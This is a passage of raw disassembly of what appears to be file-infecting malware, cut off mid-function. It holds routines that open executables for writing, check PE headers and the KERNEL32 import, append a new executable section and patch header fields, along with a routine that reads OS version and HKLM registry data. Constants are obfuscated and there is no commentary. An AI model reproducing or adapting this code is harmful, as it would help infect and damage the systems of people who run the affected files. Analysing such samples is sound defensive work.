push [ebp+var_61C98]
call dword ptr ds:1001282Ch
push 5
lea eax, [ebp+var_30F4B]
push eax
call dword ptr ds:10010094h
movzx eax, [ebp+var_30F51]
push eax
call sub_4222D8
add esp, 18h
loc_41F419: ; CODE XREF: sub_41EF87+A9�j
; sub_41EF87:loc_41F06C�j ...
push [ebp+var_30E48]
call dword ptr ds:1001282Ch
cmp [ebp+var_30F50], 0
jz short loc_41F437
push [ebp+arg_0]
call dword ptr ds:1000D008h
loc_41F437: ; CODE XREF: sub_41EF87+56�j
; sub_41EF87+4A5�j
pop edi
pop esi
pop ebx
leave
retn
sub_41EF87 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
loc_41F43F: ; CODE XREF: .data:0041F466�j
call sub_41AB71
movsx eax, word ptr ds:1001412Ch
add eax, 70h
movsx edx, word ptr ds:100140E8h
add edx, 0EA5Ch
imul eax, edx
push eax
call dword ptr ds:1001380Ch
pop ecx
jmp short loc_41F43F
; ---------------------------------------------------------------------------
pop ebp
retn 4
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
pusha
mov esi, [ebp+10h]
mov eax, 10002B6Dh
mov [esi+0B8h], eax
mov eax, [ebp+0Ch]
mov [esi+0C4h], eax
popa
mov esp, ebp
pop ebp
xor eax, eax
retn
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F48F proc near ; CODE XREF: sub_41F4A9+C8�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push 100142DCh
push 1001429Ch
push [ebp+arg_4]
push [ebp+arg_0]
call sub_425315
pop ebp
retn
sub_41F48F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F4A9 proc near ; CODE XREF: sub_41EF87+292�p
var_54 = byte ptr -54h
var_14 = dword ptr -14h
var_10 = byte ptr -10h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 54h
push ebx
push esi
push edi
mov esi, [ebp+arg_0]
mov eax, [ebp+arg_4]
add eax, 40h
jge short loc_41F4C0
add eax, 3Fh
loc_41F4C0: ; CODE XREF: sub_41F4A9+12�j
sar eax, 6
mov edi, eax
shl edi, 6
push edi
call sub_41AB52
pop ecx
mov [ebp+var_14], eax
mov edi, [ebp+arg_4]
mov edx, ds:100141CCh
add edx, 3Fh
mov eax, edi
add eax, edx
jge short loc_41F4E7
add eax, 3Fh
loc_41F4E7: ; CODE XREF: sub_41F4A9+39�j
sar eax, 6
mov edi, ds:1001409Ch
add edi, 3Bh
add edi, ds:100140A8h
mov edx, eax
imul edx, edi
push edx
push [ebp+var_14]
call dword ptr ds:1000D030h
push [ebp+arg_4]
push esi
push [ebp+var_14]
call dword ptr ds:10012808h
add esp, 0Ch
lea eax, [ebp+var_10]
push eax
call sub_425453
mov esi, [ebp+var_14]
movsx ebx, word ptr ds:10014210h
sub ebx, 6
jmp short loc_41F546
; ---------------------------------------------------------------------------
loc_41F530: ; CODE XREF: sub_41F4A9+B7�j
push esi
lea eax, [ebp+var_10]
push eax
call sub_42547A
mov eax, ds:10014184h
add eax, 3Fh
lea esi, [esi+eax]
inc ebx
loc_41F546: ; CODE XREF: sub_41F4A9+85�j
mov edi, [ebp+arg_4]
mov edx, ds:10014214h
add edx, 3Fh
mov eax, edi
add eax, edx
jge short loc_41F55B
add eax, 3Fh
loc_41F55B: ; CODE XREF: sub_41F4A9+AD�j
sar eax, 6
cmp ebx, eax
jl short loc_41F530
push [ebp+var_14]
call sub_41E431
lea eax, [ebp+var_54]
push eax
push [ebp+arg_8]
call sub_41F48F
movsx eax, word ptr ds:10014228h
add eax, 0Ch
push eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_54]
push eax
call dword ptr ds:10013828h
add esp, 18h
mov edi, ds:10014134h
sub edi, 4
cmp eax, edi
jz short loc_41F5A4
xor eax, eax
inc eax
jmp short loc_41F5A6
; ---------------------------------------------------------------------------
loc_41F5A4: ; CODE XREF: sub_41F4A9+F4�j
xor eax, eax
loc_41F5A6: ; CODE XREF: sub_41F4A9+F9�j
pop edi
pop esi
pop ebx
leave
retn
sub_41F4A9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F5AB proc near ; CODE XREF: sub_4229B3+165�p
var_FFF = byte ptr -0FFFh
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1000h
call sub_425D5D
push ebx
push esi
push edi
movsx eax, word ptr ds:1001421Ch
add eax, ds:100140D0h
sub eax, 7
push eax
lea eax, [ebp+var_FFF]
push eax
call sub_4210C1
add esp, 8
mov edi, ds:10014170h
sub edi, 5
jmp short loc_41F600
; ---------------------------------------------------------------------------
loc_41F5E6: ; CODE XREF: sub_41F5AB+5B�j
cmp [ebp+edi+var_FFF], 23h
jnz short loc_41F5FF
mov eax, ds:10014158h
sub eax, 8
mov [ebp+edi+var_FFF], al
loc_41F5FF: ; CODE XREF: sub_41F5AB+43�j
inc edi
loc_41F600: ; CODE XREF: sub_41F5AB+39�j
cmp edi, 0FFFh
jb short loc_41F5E6
lea esi, [ebp+var_FFF]
loc_41F60E: ; CODE XREF: sub_41F5AB+EB�j
push 10015355h
call sub_41B08F
push 1000EFD0h
mov ebx, ds:10014198h
add ebx, ds:10014238h
sub ebx, 12h
push ebx
mov ebx, ds:100140D0h
dec ebx
push ebx
push eax
push dword ptr ds:1001415Ch
push 0
push esi
push [ebp+arg_0]
mov ebx, ds:100141C4h
inc ebx
add ebx, ds:1001410Ch
and ebx, 0FFh
push ebx
call sub_41C00F
add esp, 28h
mov ecx, esi
or eax, 0FFFFFFFFh
loc_41F663: ; CODE XREF: sub_41F5AB+BD�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_41F663
movsx edx, word ptr ds:10014144h
add edx, ds:1001422Ch
sub edx, 0Ch
mov ebx, eax
add ebx, esi
mov esi, edx
add esi, ebx
movsx eax, byte ptr [esi]
mov edx, ds:10014238h
add edx, ds:10014100h
sub edx, 10h
cmp eax, edx
jnz loc_41F60E
pop edi
pop esi
pop ebx
leave
retn
sub_41F5AB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F6A1 proc near ; CODE XREF: sub_41E931+E1�p
var_1AC = dword ptr -1ACh
var_1A8 = dword ptr -1A8h
var_1A4 = byte ptr -1A4h
var_1A0 = byte ptr -1A0h
var_19C = dword ptr -19Ch
var_198 = dword ptr -198h
var_193 = dword ptr -193h
var_18F = dword ptr -18Fh
var_18B = dword ptr -18Bh
var_187 = dword ptr -187h
var_183 = dword ptr -183h
var_FF = byte ptr -0FFh
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1ACh
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
mov byte ptr [edi], 0
mov [ebp+var_193], 94h
lea eax, [ebp+var_193]
push eax
call dword ptr ds:10013D78h
cmp [ebp+var_183], 1
jnz short loc_41F6E8
push 1001534Fh
call sub_41B08F
push eax
push edi
call dword ptr ds:1000D024h
add esp, 0Ch
loc_41F6E8: ; CODE XREF: sub_41F6A1+30�j
cmp [ebp+var_183], 2
jnz short loc_41F706
push 10015349h
call sub_41B08F
push eax
push edi
call dword ptr ds:10013810h
add esp, 0Ch
loc_41F706: ; CODE XREF: sub_41F6A1+4E�j
push 1001533Dh
call sub_41B08F
push [ebp+var_187]
push [ebp+var_18B]
push [ebp+var_18F]
push eax
lea ebx, [ebp+var_FF]
push ebx
call dword ptr ds:10013810h
lea eax, [ebp+var_FF]
push eax
push edi
call dword ptr ds:1000D024h
push 10015336h
call sub_41B08F
movsx ebx, word ptr ds:1001421Ch
movsx edx, word ptr ds:1001411Ch
add ebx, edx
sub ebx, 0Ah
push ebx
push 0
lea ebx, [ebp+var_1A0]
push ebx
lea ebx, [ebp+var_1A0]
push ebx
lea ebx, [ebp+var_19C]
push ebx
push 0FFh
lea ebx, [ebp+var_FF]
push ebx
push eax
call dword ptr ds:100137E4h
push 1001532Eh
call sub_41B08F
push [ebp+var_19C]
push eax
lea ebx, [ebp+var_FF]
push ebx
call dword ptr ds:10013810h
lea eax, [ebp+var_FF]
push eax
push edi
call dword ptr ds:1000D024h
push 0FFh
lea eax, [ebp+var_FF]
push eax
movsx eax, word ptr ds:10014148h
add eax, ds:100141D4h
sub eax, 2
push eax
push 400h
call dword ptr ds:100105A8h
lea eax, [ebp+var_FF]
push eax
push edi
call dword ptr ds:1000D024h
push 10015329h
call sub_41B08F
push eax
push edi
call dword ptr ds:1000D024h
mov [ebp+var_198], 0FFh
push 100152FCh
call sub_41B08F
mov [ebp+var_1A8], eax
push 100152EFh
call sub_41B08F
lea ebx, [ebp+var_1A4]
push ebx
lea ebx, [ebp+var_198]
push ebx
lea ebx, [ebp+var_FF]
push ebx
push eax
mov ebx, [ebp+var_1A8]
push ebx
push 80000002h
call sub_424B0F
add esp, 70h
mov esi, eax
mov eax, ds:100141D8h
sub eax, 2
cmp esi, eax
jnz short loc_41F869
lea eax, [ebp+var_FF]
push eax
push edi
call dword ptr ds:1000D024h
add esp, 8
jmp short loc_41F8D4
; ---------------------------------------------------------------------------
loc_41F869: ; CODE XREF: sub_41F6A1+1B3�j
mov [ebp+var_198], 0FFh
push 100152BFh
call sub_41B08F
mov [ebp+var_1AC], eax
push 100152B2h
call sub_41B08F
lea ebx, [ebp+var_1A4]
push ebx
lea ebx, [ebp+var_198]
push ebx
lea ebx, [ebp+var_FF]
push ebx
push eax
mov ebx, [ebp+var_1AC]
push ebx
push 80000002h
call sub_424B0F
add esp, 20h
mov esi, eax
mov eax, ds:10014240h
inc eax
cmp esi, eax
jnz short loc_41F8D4
lea eax, [ebp+var_FF]
push eax
push edi
call dword ptr ds:1000D024h
add esp, 8
loc_41F8D4: ; CODE XREF: sub_41F6A1+1C6�j
; sub_41F6A1+220�j
pop edi
pop esi
pop ebx
leave
retn
sub_41F6A1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F8D9 proc near ; CODE XREF: sub_423806+1BF�p
var_32016 = byte ptr -32016h
var_32014 = dword ptr -32014h
var_32010 = dword ptr -32010h
var_3200B = byte ptr -3200Bh
var_31F5C = dword ptr -31F5Ch
var_31F58 = dword ptr -31F58h
var_31F54 = dword ptr -31F54h
var_31F50 = dword ptr -31F50h
var_31F4C = dword ptr -31F4Ch
var_31F48 = dword ptr -31F48h
var_31F44 = dword ptr -31F44h
var_31F40 = dword ptr -31F40h
var_31F3C = dword ptr -31F3Ch
var_31F38 = dword ptr -31F38h
var_31F34 = dword ptr -31F34h
var_31F30 = dword ptr -31F30h
var_31F2C = dword ptr -31F2Ch
var_31F28 = dword ptr -31F28h
var_31F24 = dword ptr -31F24h
var_31F20 = dword ptr -31F20h
var_31F1C = dword ptr -31F1Ch
var_31F18 = dword ptr -31F18h
var_31F14 = dword ptr -31F14h
var_31F10 = dword ptr -31F10h
var_31F0C = dword ptr -31F0Ch
var_31F08 = dword ptr -31F08h
var_31F04 = dword ptr -31F04h
var_31F00 = dword ptr -31F00h
var_31EFC = dword ptr -31EFCh
var_31EF8 = dword ptr -31EF8h
var_31EF4 = dword ptr -31EF4h
var_31EF0 = dword ptr -31EF0h
var_31EEC = dword ptr -31EECh
var_31EE8 = dword ptr -31EE8h
var_31EE4 = dword ptr -31EE4h
var_31EE0 = dword ptr -31EE0h
var_31EDC = dword ptr -31EDCh
var_31ED8 = dword ptr -31ED8h
var_31ED4 = byte ptr -31ED4h
var_31EC7 = byte ptr -31EC7h
var_1194 = dword ptr -1194h
var_1190 = dword ptr -1190h
var_118C = dword ptr -118Ch
var_1188 = dword ptr -1188h
var_1184 = dword ptr -1184h
var_1180 = dword ptr -1180h
var_117C = dword ptr -117Ch
var_1178 = dword ptr -1178h
var_1174 = dword ptr -1174h
var_116F = byte ptr -116Fh
var_1070 = dword ptr -1070h
var_106C = dword ptr -106Ch
var_1068 = dword ptr -1068h
var_1064 = dword ptr -1064h
var_1060 = dword ptr -1060h
var_105C = dword ptr -105Ch
var_1058 = dword ptr -1058h
var_1054 = dword ptr -1054h
var_1050 = dword ptr -1050h
var_C54 = dword ptr -0C54h
var_C50 = dword ptr -0C50h
var_C4C = dword ptr -0C4Ch
var_850 = dword ptr -850h
var_84C = dword ptr -84Ch
var_848 = dword ptr -848h
var_844 = dword ptr -844h
var_840 = dword ptr -840h
var_83C = dword ptr -83Ch
var_440 = dword ptr -440h
var_43C = dword ptr -43Ch
var_438 = dword ptr -438h
var_434 = dword ptr -434h
var_430 = dword ptr -430h
var_42C = dword ptr -42Ch
var_428 = dword ptr -428h
var_424 = dword ptr -424h
var_420 = dword ptr -420h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, 32014h
call sub_425D5D
push ebx
push esi
push edi
push [ebp+arg_8]
push [ebp+arg_4]
lea eax, [ebp+var_31EC7]
push eax
call dword ptr ds:10012808h
add esp, 0Ch
movsx eax, word ptr ds:1001423Ch
add eax, ds:10014188h
sub eax, 0Eh
mov [ebp+var_31EE0], eax
loc_41F915: ; CODE XREF: sub_41F8D9+9B�j
push 0
movsx eax, word ptr ds:10014130h
sub eax, 2
push eax
push 3
push 0
movsx eax, word ptr ds:100140B8h
sub eax, 9
push eax
push 0C0000001h
push [ebp+arg_0]
call dword ptr ds:10013968h
mov [ebp+var_1070], eax
cmp eax, 0FFFFFFFFh
jnz short loc_41F97D
inc [ebp+var_31EE0]
movsx eax, word ptr ds:10014180h
movsx edx, word ptr ds:100140A0h
add eax, edx
sub eax, 5
cmp [ebp+var_31EE0], eax
jnz short loc_41F976
push [ebp+arg_0]
call sub_41B754
pop ecx
jmp short loc_41F915
; ---------------------------------------------------------------------------
loc_41F976: ; CODE XREF: sub_41F8D9+90�j
xor eax, eax
jmp loc_420DE7
; ---------------------------------------------------------------------------
loc_41F97D: ; CODE XREF: sub_41F8D9+6F�j
push 0
push [ebp+var_1070]
call dword ptr ds:100137F8h
mov [ebp+var_10], eax
mov edx, [ebp+arg_8]
lea eax, [eax+edx+1FFFFh]
push eax
push 0
call dword ptr ds:100109ECh
mov [ebp+var_4], eax
push 0
lea eax, [ebp+var_31EDC]
push eax
push [ebp+var_10]
push [ebp+var_4]
push [ebp+var_1070]
call dword ptr ds:1000D02Ch
mov eax, [ebp+var_4]
mov eax, [eax+3Ch]
mov [ebp+var_840], eax
mov eax, [ebp+var_31EDC]
sub eax, 0F8h
cmp [ebp+var_840], eax
ja loc_420DD0
mov eax, [ebp+var_840]
add eax, [ebp+var_4]
mov [ebp+var_8], eax
movzx eax, word ptr [eax]
cmp eax, 4550h
jnz loc_420DD0
mov eax, [ebp+var_8]
movzx eax, word ptr [eax+5Ch]
cmp eax, ds:100141E0h
jz loc_420DD0
and [ebp+var_1180], 0
mov eax, [ebp+var_8]
movzx edx, word ptr [eax+44h]
mov ecx, ds:10014134h
add ecx, 9
cmp edx, ecx
jnz short loc_41FA62
mov edx, ds:100140D8h
add edx, 3
mov [eax+1Ah], dl
cmp dl, 0
jz short loc_41FA62
movzx eax, word ptr [eax+46h]
mov [ebp+var_31EF0], eax
movsx eax, word ptr ds:10014128h
cmp [ebp+var_31EF0], eax
jnb loc_420DD0
mov [ebp+var_1180], 1
loc_41FA62: ; CODE XREF: sub_41F8D9+14F�j
; sub_41F8D9+160�j
cmp [ebp+var_1180], 0
jz short loc_41FA89
mov eax, [ebp+var_8]
add eax, 6
movzx edx, word ptr [eax]
movsx ecx, word ptr ds:1001411Ch
add ecx, ds:100141D8h
sub ecx, 3
sub edx, ecx
mov [eax], dx
loc_41FA89: ; CODE XREF: sub_41F8D9+190�j
mov eax, [ebp+var_8]
mov eax, [eax+80h]
mov [ebp+var_430], eax
mov eax, 28h
mov [ebp+var_31EF0], eax
mov edx, [ebp+var_8]
mov [ebp+var_31EF8], edx
mov ecx, [ebp+var_840]
add ecx, 0F8h
mov [ebp+var_31EF4], eax
movzx edi, word ptr [edx+6]
mul edi
mov [ebp+var_31EFC], eax
mov edx, ecx
add edx, eax
mov [ebp+var_31F04], edx
mov eax, [ebp+var_31EF0]
mov [ebp+var_31F00], eax
movsx ecx, word ptr ds:1001411Ch
mul ecx
mov [ebp+var_31F08], eax
mov eax, [ebp+var_31F04]
mov edx, [ebp+var_31F08]
add eax, edx
mov edx, [ebp+var_31EF8]
add eax, [edx+0D4h]
cmp eax, [edx+54h]
ja loc_420DD0
movsx eax, word ptr ds:100140B4h
add eax, ds:100140E0h
sub eax, 6
mov [ebp+var_20], eax
mov eax, ds:100140FCh
add eax, ds:10014248h
sub eax, 7
mov [ebp+var_C54], eax
mov eax, ds:100141F4h
add eax, ds:1001424Ch
sub eax, 0Ch
mov [ebp+var_105C], eax
mov eax, ds:100141C8h
add eax, ds:10014100h
sub eax, 9
mov [ebp+var_434], eax
jmp loc_41FC28
; ---------------------------------------------------------------------------
loc_41FB66: ; CODE XREF: sub_41F8D9+35C�j
mov eax, 28h
mul [ebp+var_434]
mov [ebp+var_31F14], eax
mov eax, [ebp+var_840]
mov edx, [ebp+var_4]
lea eax, [eax+edx+0F8h]
mov edx, [ebp+var_31F14]
mov esi, edx
add esi, eax
mov eax, [esi+0Ch]
add eax, [esi+8]
mov [ebp+var_31F0C], eax
mov eax, [esi+14h]
add eax, [esi+10h]
mov [ebp+var_31F10], eax
mov eax, [ebp+var_20]
cmp [ebp+var_31F0C], eax
jbe short loc_41FBBD
mov eax, [ebp+var_31F0C]
mov [ebp+var_20], eax
loc_41FBBD: ; CODE XREF: sub_41F8D9+2D9�j
mov eax, [ebp+var_C54]
cmp [ebp+var_31F10], eax
jbe short loc_41FBD7
mov eax, [ebp+var_31F10]
mov [ebp+var_C54], eax
loc_41FBD7: ; CODE XREF: sub_41F8D9+2F0�j
mov eax, [ebp+var_8]
mov eax, [eax+0A8h]
cmp eax, [esi+0Ch]
jb short loc_41FC02
cmp eax, [ebp+var_31F0C]
jnb short loc_41FC02
mov eax, [esi+14h]
mov edx, [ebp+var_8]
add eax, [edx+0A8h]
sub eax, [esi+0Ch]
mov [ebp+var_105C], eax
loc_41FC02: ; CODE XREF: sub_41F8D9+30A�j
; sub_41F8D9+312�j
mov eax, [ebp+var_430]
mov edx, [esi+0Ch]
cmp eax, edx
jb short loc_41FC22
add edx, [esi+8]
cmp eax, edx
jnb short loc_41FC22
sub eax, [esi+0Ch]
add eax, [esi+14h]
mov [ebp+var_844], eax
loc_41FC22: ; CODE XREF: sub_41F8D9+334�j
; sub_41F8D9+33B�j
inc [ebp+var_434]
loc_41FC28: ; CODE XREF: sub_41F8D9+288�j
mov eax, [ebp+var_8]
movzx eax, word ptr [eax+6]
cmp [ebp+var_434], eax
jb loc_41FB66
mov eax, ds:10014118h
add eax, 0FF4h
movsx edx, word ptr ds:10014160h
add eax, edx
push eax
push [ebp+var_20]
call sub_421499
add esp, 8
mov [ebp+var_20], eax
cmp [ebp+var_1180], 0
jz short loc_41FC6F
mov eax, [ebp+var_C54]
mov [ebp+var_10], eax
loc_41FC6F: ; CODE XREF: sub_41F8D9+38B�j
mov eax, [ebp+var_C54]
cmp [ebp+var_10], eax
jz short loc_41FC99
mov eax, [ebp+var_8]
movsx edx, word ptr ds:100141F0h
add edx, ds:10014124h
sub edx, 4
cmp [eax+0A8h], edx
jz loc_420DD0
loc_41FC99: ; CODE XREF: sub_41F8D9+39F�j
mov eax, ds:10014094h
movsx edx, word ptr ds:100140B4h
add eax, edx
sub eax, 6
cmp [ebp+var_105C], eax
jz loc_41FD81
mov eax, ds:10014178h
sub eax, 5
mov [ebp+var_31F14], eax
mov eax, ds:100141FCh
add eax, ds:1001420Ch
sub eax, 0Bh
mov [ebp+var_31F0C], eax
jmp short loc_41FD28
; ---------------------------------------------------------------------------
loc_41FCDA: ; CODE XREF: sub_41F8D9+475�j
mov eax, [ebp+var_105C]
mov [ebp+var_31F18], eax
mov eax, 1Ch
mul [ebp+var_31F0C]
mov [ebp+var_31F1C], eax
mov eax, [ebp+var_31F18]
mov edx, [ebp+var_31F1C]
add eax, edx
add eax, [ebp+var_4]
mov [ebp+var_31F10], eax
mov edx, [ebp+var_31F14]
cmp [eax+18h], edx
jbe short loc_41FD22
mov eax, [eax+18h]
mov [ebp+var_31F14], eax
loc_41FD22: ; CODE XREF: sub_41F8D9+43E�j
inc [ebp+var_31F0C]
loc_41FD28: ; CODE XREF: sub_41F8D9+3FF�j
mov edi, [ebp+var_8]
mov eax, [edi+0ACh]
mov ecx, 1Ch
shr eax, 2
mov edx, 24924925h
mul edx
mov [ebp+var_31F18], edx
mov edi, edx
cmp [ebp+var_31F0C], edi
jb short loc_41FCDA
mov eax, [ebp+var_8]
push dword ptr [eax+3Ch]
push [ebp+var_31F14]
call sub_421499
add esp, 8
mov [ebp+var_31F14], eax
mov eax, [ebp+var_C54]
cmp eax, [ebp+var_10]
jz short loc_41FD81
cmp [ebp+var_31F14], eax
jnz loc_420DD0
loc_41FD81: ; CODE XREF: sub_41F8D9+3D7�j
; sub_41F8D9+49A�j
and [ebp+var_1174], 0
mov eax, ds:100140F0h
mov [ebp+var_438], eax
jmp loc_41FED0
; ---------------------------------------------------------------------------
loc_41FD98: ; CODE XREF: sub_41F8D9+606�j
mov eax, [ebp+var_844]
add eax, [ebp+var_438]
add eax, [ebp+var_4]
mov [ebp+var_32010], eax
mov edx, ds:10014214h
movsx ecx, word ptr ds:10014210h
add edx, ecx
sub edx, 7
cmp [eax], edx
jz loc_41FEE5
mov eax, [ebp+var_32010]
mov eax, [eax+0Ch]
sub eax, [ebp+var_430]
add eax, [ebp+var_844]
mov [ebp+var_32014], eax
add eax, [ebp+var_4]
push eax
lea eax, [ebp+var_3200B]
push eax
call dword ptr ds:100101A4h
add esp, 8
mov eax, ds:10014208h
movsx edx, word ptr ds:10014120h
add eax, edx
sub eax, 0Fh
mov [ebp+var_31F0C], eax
jmp short loc_41FE3A
; ---------------------------------------------------------------------------
loc_41FE0F: ; CODE XREF: sub_41F8D9+57A�j
mov eax, [ebp+var_31F0C]
mov al, [ebp+eax+var_3200B]
cmp al, 61h
jle short loc_41FE34
cmp al, 7Ah
jge short loc_41FE34
mov eax, [ebp+var_31F0C]
lea eax, [ebp+eax+var_3200B]
sub byte ptr [eax], 20h
loc_41FE34: ; CODE XREF: sub_41F8D9+545�j
; sub_41F8D9+549�j
inc [ebp+var_31F0C]
loc_41FE3A: ; CODE XREF: sub_41F8D9+534�j
mov eax, [ebp+var_31F0C]
movsx eax, [ebp+eax+var_3200B]
mov edx, ds:10014100h
sub edx, 7
cmp eax, edx
jnz short loc_41FE0F
mov eax, ds:100140E0h
cmp byte ptr [ebp+eax+var_32010+3], 4Bh
jnz short loc_41FEC9
mov eax, ds:100141A4h
add eax, ds:100141D8h
cmp byte ptr [ebp+eax+var_32010+2], 45h
jnz short loc_41FEC9
mov eax, ds:10014108h
mov edx, ds:1001409Ch
add edx, eax
cmp byte ptr [ebp+edx+var_32014+1], 52h
jnz short loc_41FEC9
mov edx, ds:100141D0h
cmp [ebp+edx+var_3200B], 4Ch
jnz short loc_41FEC9
cmp byte ptr [ebp+eax+var_32010+2], 33h
jnz short loc_41FEC9
mov eax, ds:100140B0h
add eax, ds:10014238h
cmp [ebp+eax+var_32016], 32h
jnz short loc_41FEC9
mov [ebp+var_1174], 1
loc_41FEC9: ; CODE XREF: sub_41F8D9+589�j
; sub_41F8D9+59E�j ...
add [ebp+var_438], 14h
loc_41FED0: ; CODE XREF: sub_41F8D9+4BA�j
mov eax, [ebp+var_8]
mov eax, [eax+84h]
cmp [ebp+var_438], eax
jb loc_41FD98
loc_41FEE5: ; CODE XREF: sub_41F8D9+4E8�j
cmp [ebp+var_1174], 0
jz loc_420DD0
mov eax, [ebp+var_8]
add eax, 16h
or word ptr [eax], 1
lea eax, [ebp+var_31EC7]
mov [ebp+var_42C], eax
mov eax, [eax+3Ch]
mov [ebp+var_84C], eax
add eax, [ebp+var_42C]
mov [ebp+var_848], eax
cmp [ebp+var_1180], 0
jnz loc_4200CC
mov eax, [ebp+var_8]
mov [ebp+var_31F0C], eax
movsx edx, word ptr ds:10014190h
sub edx, 5
cmp [eax+0D0h], edx
jz loc_4200CC
mov edx, [eax+0D4h]
mov [ebp+var_31F10], edx
mov ecx, ds:10014208h
sub ecx, 6
cmp edx, ecx
jz loc_4200CC
mov ecx, 28h
mov edi, [ebp+var_840]
add edi, 0F8h
mov eax, ecx
mov edx, [ebp+var_31F0C]
movzx edx, word ptr [edx+6]
mov [ebp+var_31F14], edx
mul edx
mov [ebp+var_31F18], eax
mov edx, edi
add edx, eax
mov [ebp+var_31F20], edx
mov eax, ecx
mov [ebp+var_31F1C], eax
mov ecx, ds:100141B4h
movsx edi, word ptr ds:10014210h
add ecx, edi
sub ecx, 6
mul ecx
mov [ebp+var_31F24], eax
mov eax, [ebp+var_31F20]
mov edx, [ebp+var_31F24]
add eax, edx
mov edx, [ebp+var_31F10]
add eax, edx
mov edx, [ebp+var_31F0C]
cmp [edx+54h], eax
jbe loc_4200CC
mov eax, [ebp+var_840]
add eax, 0F8h
mov [ebp+var_31F30], eax
mov eax, 28h
mov ecx, [ebp+var_8]
movzx ecx, word ptr [ecx+6]
mul ecx
mov [ebp+var_31F34], eax
mov eax, [ebp+var_31F30]
mov edx, [ebp+var_31F34]
add eax, edx
mov [ebp+var_31F28], eax
mov [ebp+var_31F38], eax
mov eax, 28h
mov ecx, [ebp+var_848]
movzx ecx, word ptr [ecx+6]
movsx edi, word ptr ds:10014220h
add edi, ds:100140C8h
sub edi, 7
sub ecx, edi
mul ecx
mov [ebp+var_31F3C], eax
mov eax, [ebp+var_31F38]
mov edx, [ebp+var_31F3C]
add eax, edx
mov [ebp+var_31F2C], eax
mov eax, [ebp+var_8]
push dword ptr [eax+0D4h]
mov eax, [ebp+var_4]
mov edx, [ebp+var_31F28]
add edx, eax
push edx
mov edx, [ebp+var_31F2C]
add edx, eax
push edx
call dword ptr ds:10012808h
add esp, 0Ch
mov eax, [ebp+var_8]
add eax, 0D0h
mov [ebp+var_31F40], eax
mov eax, 28h
mov ecx, [ebp+var_848]
movzx ecx, word ptr [ecx+6]
movsx edi, word ptr ds:100141F0h
add edi, ds:1001413Ch
sub edi, 8
sub ecx, edi
mul ecx
mov [ebp+var_31F44], eax
mov eax, [ebp+var_31F40]
mov edx, eax
mov ecx, [ebp+var_31F44]
add [edx], ecx
loc_4200CC: ; CODE XREF: sub_41F8D9+64B�j
; sub_41F8D9+66A�j ...
mov eax, [ebp+var_8]
push dword ptr [eax+3Ch]
push [ebp+var_10]
call sub_421499
mov [ebp+var_10], eax
mov eax, 28h
mov ecx, [ebp+var_8]
movzx ecx, word ptr [ecx+6]
mul ecx
mov [ebp+var_31F28], eax
mov eax, [ebp+var_840]
mov edx, [ebp+var_4]
lea eax, [eax+edx+0F8h]
mov edx, [ebp+var_31F28]
mov esi, edx
add esi, eax
push 100152A9h
call sub_41B08F
push eax
push esi
call dword ptr ds:100101A4h
mov eax, ds:10014200h
add eax, 1FFFAh
mov [esi+8], eax
mov eax, [ebp+var_20]
mov [esi+0Ch], eax
mov eax, [ebp+var_8]
push dword ptr [eax+3Ch]
mov eax, [ebp+arg_8]
add eax, 0Dh
push eax
call sub_421499
mov [esi+10h], eax
mov eax, [ebp+var_10]
mov [esi+14h], eax
mov eax, ds:1001417Ch
add eax, 0E0000017h
mov [esi+24h], eax
mov eax, ds:10014198h
inc eax
add eax, ds:10014094h
push eax
mov eax, ds:100140BCh
movsx edx, word ptr ds:10014220h
add eax, edx
sub eax, 9
push eax
mov eax, esi
add eax, 18h
push eax
call dword ptr ds:10012818h
mov eax, [ebp+var_20]
mov [ebp+var_1060], eax
mov eax, [ebp+var_10]
mov [ebp+var_850], eax
mov eax, [ebp+var_8]
push dword ptr [eax+3Ch]
mov eax, [ebp+var_10]
add eax, [esi+10h]
push eax
call sub_421499
add esp, 30h
mov [ebp+var_10], eax
movsx eax, word ptr ds:100140E8h
mov edx, ds:100141A8h
lea eax, [eax+edx+1FFF4h]
add [ebp+var_20], eax
mov eax, [ebp+var_8]
add eax, 6
inc word ptr [eax]
mov eax, [ebp+var_8]
mov edx, [esi+0Ch]
add edx, [esi+8]
mov [eax+50h], edx
call dword ptr ds:10013D90h
movsx edi, word ptr ds:10014228h
sub edi, 3
mov ecx, 0FDh
cdq
idiv ecx
add edi, edx
mov [ebp+var_1064], edi
mov eax, ds:10014124h
sub eax, 2
mov edx, [ebp+var_42C]
mov ecx, edi
xor ecx, 4Dh
mov [edx+eax], cl
mov edi, ds:10014134h
sub edi, 3
mov ecx, [ebp+arg_8]
shr ecx, 9
mov [edx+edi], cl
call dword ptr ds:10013D90h
mov edi, [ebp+var_84C]
mov edx, [ebp+var_42C]
mov [ebp+var_31F30], edx
mov [ebp+var_31F2C], eax
mov ecx, 0FFh
cdq
idiv ecx
mov ecx, [ebp+var_31F30]
mov [ecx+edi], dl
call dword ptr ds:10013D90h
movsx edx, word ptr ds:100140F8h
add edx, ds:100141CCh
dec edx
add edi, edx
mov edx, [ebp+var_42C]
mov [ebp+var_31F38], edx
mov [ebp+var_31F34], eax
mov ecx, 0FFh
cdq
idiv ecx
mov ecx, [ebp+var_31F38]
mov [ecx+edi], dl
movsx eax, word ptr ds:1001421Ch
mov edx, ds:10014138h
lea eax, [eax+edx+35h]
